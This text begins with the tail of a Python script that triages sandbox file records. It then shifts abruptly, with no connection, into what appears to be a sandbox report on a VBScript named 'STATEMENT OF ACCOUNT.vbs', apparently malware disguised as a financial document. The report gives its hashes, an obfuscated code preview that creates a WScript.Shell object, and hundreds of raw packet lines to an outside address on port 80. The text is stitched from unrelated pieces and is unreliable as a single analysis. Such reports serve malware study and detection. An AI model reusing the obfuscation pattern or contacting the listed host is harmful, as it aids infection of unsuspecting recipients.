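    begins at every "Process:" line. Only the first ':' separates key
    from value, so paths and previews containing ':' survive intact."""
    records, current = [], None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def classify(record: dict) -> str:
    """Label a record by its preview prefix; anything unknown stays open."""
    preview = record.get("Preview", "")
    for prefix, label in KNOWN_BENIGN:
        if preview.startswith(prefix):
            return label
    return "unclassified"


def triage(text: str) -> list:
    """One row per distinct SHA-256: how many records share it, which
    processes wrote it, and whether it is a known benign artefact."""
    groups = defaultdict(list)
    for rec in parse_records(text):
        groups[rec["SHA-256"]].append(rec)
    rows = []
    for sha, recs in groups.items():
        rows.append({
            "sha256": sha,
            "count": len(recs),
            "size": int(recs[0]["Size (bytes)"]),
            "processes": sorted({r["Process"].rsplit("\\", 1)[-1] for r in recs}),
            "class": classify(recs[0]),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_TEXT):
        print(f"{row['sha256'][:16]}...  x{row['count']}  {row['size']:>6} B  "
              f"{','.join(row['processes'])}  {row['class']}")
```

Grouping by the reported hash rather than by preview is deliberate: two records with the same preview but different hashes (for example a tampered AppLocker probe) would stay separate, and only the exact known content gets the benign label.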
                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):5.422111260485721
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:STATEMENT OF ACCOUNT.vbs
                  File size:24'744 bytes
                  MD5:229da25a75bd9df3b4bd92268ed0d2fe
                  SHA1:fe45ca4366c5f7a5bc6df83bc66e18b691041f4f
                  SHA256:ec41d23e297c8f8aa407ef610a8f3082a1e103addf113cfe3e4d2ec6733b54e8
                  SHA512:539709f48c888e79211b914089adc5840a322436f8d9e65341982458ceb67abfe37e5d843535e59e21e070724afbcb376509946aec2a5909d7bf57d9931917e1
                  SSDEEP:384:SfIpd2uRhZtoznRlsAfQNoQyOK0hDHFdcFNbVTQIhRpoOn:SMd2uRLtoUAfQNoQyaDl2TQI2On
                  TLSH:FAB22A9619110FBC8A031BBA452B34F8C172197F67B568D05C38606EF8A66DC3F1BF86
                  File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Recompute = Smagsdommeren......Set Nonimpressionist = CreateObject("WScript.Shell")......Call Unmineralizeds("cls;write")..Call Unmineralized
                  Icon Hash:68d69b8f86ab9a86
                   Timestamp                              Source Port  Dest Port  Source IP        Dest IP
                   Jul 2, 2024 10:27:03.598133087 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:03.939790010 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:03.939876080 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:03.940207958 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:03.944987059 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914321899 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914340973 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914354086 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914407969 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914421082 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:04.914475918 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:04.914607048 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.172465086 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172533989 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172544003 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172559977 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172583103 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172594070 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172604084 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.172621012 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.172662973 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.173305035 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.173340082 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.173351049 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.173365116 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.173384905 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.173394918 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.217209101 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.431489944 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431510925 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431521893 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431528091 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431732893 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431746006 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431756973 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431780100 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431788921 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.431792021 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.431840897 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.431895971 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.432683945 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.432697058 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.432708025 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.432723045 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.432735920 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.432740927 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.432768106 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.432792902 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.520951986 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.576586008 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.693696022 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693717003 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693726063 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693787098 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693794012 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693800926 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.693877935 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.694061995 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694076061 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694072008 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.694088936 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694114923 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.694386959 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694401979 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694444895 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.694448948 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694462061 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694473982 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694487095 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.694504023 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.694514990 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.695360899 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.695372105 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.695398092 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.695410013 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.695411921 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.695421934 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.695449114 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.695461035 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.954504013 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954533100 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954545975 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954560995 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954575062 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954623938 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954627037 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.954637051 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954668999 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.954668999 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954679012 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.954690933 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954701900 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954714060 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954720974 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954735041 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.954750061 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.954771042 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.955385923 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955398083 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955411911 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955431938 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.955452919 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955465078 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955471039 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.955477953 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955490112 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955508947 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.955517054 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.955533981 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.956334114 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956346035 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956398964 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.956398964 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956412077 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956423998 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956438065 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956450939 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.956453085 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956465960 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.956471920 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:05.956496954 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:05.998338938 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.212810993 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212825060 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212835073 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212901115 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212918997 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212929010 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212940931 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212959051 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212969065 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212980986 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.212991953 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213005066 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213115931 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.213154078 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.213675022 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213685989 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213727951 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213733912 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.213784933 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213795900 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213807106 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.213833094 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.213860989 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214055061 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214092970 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214103937 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214143991 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214189053 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214200974 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214210987 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214224100 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214236975 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214262009 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214709044 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214720011 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214731932 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214761972 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214777946 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214796066 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214807987 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214823961 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214837074 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214850903 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214880943 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.214888096 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214899063 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214911938 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.214937925 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.215626955 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215643883 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215660095 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215671062 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215675116 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.215682983 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215692997 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.215698004 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.215722084 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.264044046 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.304017067 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.357821941 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473506927 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473526955 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473539114 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473584890 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473622084 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473634005 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473645926 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473659039 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473678112 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473706961 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473797083 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473808050 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473819971 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473831892 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473844051 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473856926 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.473944902 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473958015 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.473968983 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474006891 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.474036932 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.474410057 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474421978 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474432945 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474443913 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474456072 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474462032 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.474467993 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.474488020 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.474509001 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475250006 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475261927 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475291967 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475410938 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475425005 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475435019 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475445032 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475457907 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475464106 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475503922 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475667953 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475678921 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475692034 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475703955 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475716114 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475718975 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475727081 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475739002 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.475740910 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475763083 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.475780010 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476006031 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476016998 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476027966 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476061106 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476172924 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476186037 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476196051 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476207018 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476217985 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476223946 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476231098 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476243019 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476253033 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476274967 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476289988 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476315975 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476490974 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476501942 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476512909 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.476535082 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.476550102 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.477157116 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.477168083 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.477179050 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.477189064 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.477200985 CEST    80           49731      103.237.86.247   192.168.2.4
                   Jul 2, 2024 10:27:06.477231026 CEST    49731        80         192.168.2.4      103.237.86.247
                   Jul 2, 2024 10:27:06.477253914 CEST    49731        80         192.168.2.4      103.237.86.247
                  Jul 2, 2024 10:27:06.731992006 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732012987 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732024908 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732037067 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732053041 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732115030 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732172012 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732194901 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732211113 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732240915 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732305050 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732317924 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732331038 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732345104 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732347965 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732357025 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732381105 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732407093 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732418060 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732430935 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732441902 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732455015 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732472897 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732476950 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732498884 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732500076 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732549906 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732875109 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732887983 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732899904 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732949018 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732960939 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.733050108 CEST4973180192.168.2.4103.237.86.247
